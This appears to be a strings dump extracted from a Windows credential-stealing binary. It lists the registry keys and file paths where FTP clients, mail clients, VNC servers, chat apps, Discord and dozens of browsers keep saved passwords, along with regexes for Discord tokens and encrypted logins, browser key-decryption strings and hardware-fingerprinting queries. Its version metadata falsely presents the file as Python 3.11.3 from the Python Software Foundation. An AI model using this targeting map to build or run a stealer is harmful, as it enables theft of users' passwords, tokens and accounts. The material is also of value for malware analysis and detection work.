WinSCP
SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
PublicKeyFile
PortNumber
[PRIVATE KEY LOCATION: "{0}"]
ABCDEF
Flash FXP
Sites.dat
\FlashFXP\
quick.dat
yA36zA48dEhfrvghGRg57h5UlDv3
FTP Navigator
SystemDrive
\FTP Navigator\Ftplist.txt
No Password
Server
SmartFTP
SmartFTP\Client 2.0\Favorites\Quick Connect
WS_FTP
Ipswitch\WS_FTP\Sites\ws_ftp.ini
FtpCommander
;Port=
;Password=
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\Program Files (x86)\FTP Commander\Ftplist.txt
;User=
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
;Server=
;Anonymous=
FTPGetter
\FTPGetter\servers.xml
<server>
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
COMPlus_legacyCorruptedStateExceptionsPolicy
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
eM Client\accounts.dat
o6806642kbM7c5
Mailbird
SenderIdentities
Server_Host
Username
EncryptedPassword
\Mailbird\Store\Store.db
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
TigerVNC
Software\TigerVNC\Server
TightVNC
Software\TightVNC\Server
PasswordViewOnly
SOFTWARE\RealVNC\WinVNC4
Software\ORL\WinVNC3
TightVNC ControlPassword
ControlPassword
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
Local Storage\leveldb
discordptb
discordcanary
origin_url
username_value
Opera Stable
\Local State
"encrypted_key":"(.*?)"
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
logins.json
[^\u0020-\u007F]
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Password:
Host:
Username:
Application:
<br>Username:
<br>Password:
<br>Application:
<br><hr>
Epic Privacy
Epic Privacy Browser\User Data
Torch Browser
Torch\User Data
360 Browser
360Chrome\Chrome\User Data
IceDragon
\Comodo\IceDragon\
Chromium
Chromium\User Data
CentBrowser
CentBrowser\User Data
PaleMoon
\Moonchild Productions\Pale Moon\
BraveSoftware\Brave-Browser\User Data
Postbox
\Postbox\
Edge Chromium
Microsoft\Edge\User Data
Thunderbird
\Thunderbird\
WaterFox
\Waterfox\
Cool Novo
MapleStudio\ChromePlus\User Data
Orbitum
Orbitum\User Data
Sputnik
Sputnik\Sputnik\User Data
Kometa
Kometa\User Data
Coowon
Coowon\Coowon\User Data
Liebao Browser
liebao\User Data
uCozMedia\Uran\User Data
QIP Surf
QIP Surf\User Data
7Star\7Star\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Firefox
\Mozilla\Firefox\
Chrome
Google\Chrome\User Data
Comodo Dragon
Comodo\Dragon\User Data
Coccoc
CocCoc\Browser\User Data
Amigo\User Data
CyberFox
\8pecxstudios\Cyberfox\
K-Meleon
\K-Meleon\
Iridium Browser
Iridium\User Data
Vivaldi
Vivaldi\User Data
Opera Browser
Opera Software\Opera Stable
BlackHawk
\NETGATE Technologies\BlackHawk\
Chedot
Chedot\User Data
SeaMonkey
\Mozilla\SeaMonkey\
Elements Browser
Elements Browser\User Data
IceCat
\Mozilla\icecat\
Citrio
CatalinaGroup\Citrio\User Data
Yandex Browser
Yandex\YandexBrowser\User Data
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
global-messages-db.sqlite
identities
{0:X2}
INTEGER
SEQUENCE {
OCTETSTRING
OBJECTIDENTIFIER
Windows Credential
policy
chrome
{{{0}}}
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
605a0946-04dd-4b2b-9d6e-89b25a74626a
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
ffe76115-a34d-4c0f-99b2-d0f6dfd9a7e3
Win32_BaseBoard
SerialNumber
edc9dee2-19c7-48e8-b67a-02594ed103da
FormatID: {0}
Version: 0x{0:X}
StorageSize: {0} (0x{0:X})
Size of the SerializedPropertyStore is less than {0} ({1})
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Version is not equal to {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
Value: {0}
Type: {0}
Name: {0}
NameSize: {0} (0x{0:X})
ValueSize: {0} (0x{0:X})
Size of the StringName is not equal to {0} ({1})
Size of the StringName is less than 9 ({0})
Size of the NameSize is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Python 3.11.3 (64-bit)
CompanyName
Python Software Foundation
FileDescription
FileVersion
1.0.0.0
InternalName
f45b853c-c9d3-495e-9acb-d41a4a90029f.exe
LegalCopyright
Copyright (c) Python Software Foundation. All rights reserved.
LegalTrademarks
Python Software Foundation
OriginalFilename
f45b853c-c9d3-495e-9acb-d41a4a90029f.exe
ProductName
Python 3.11.3 (64-bit)
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0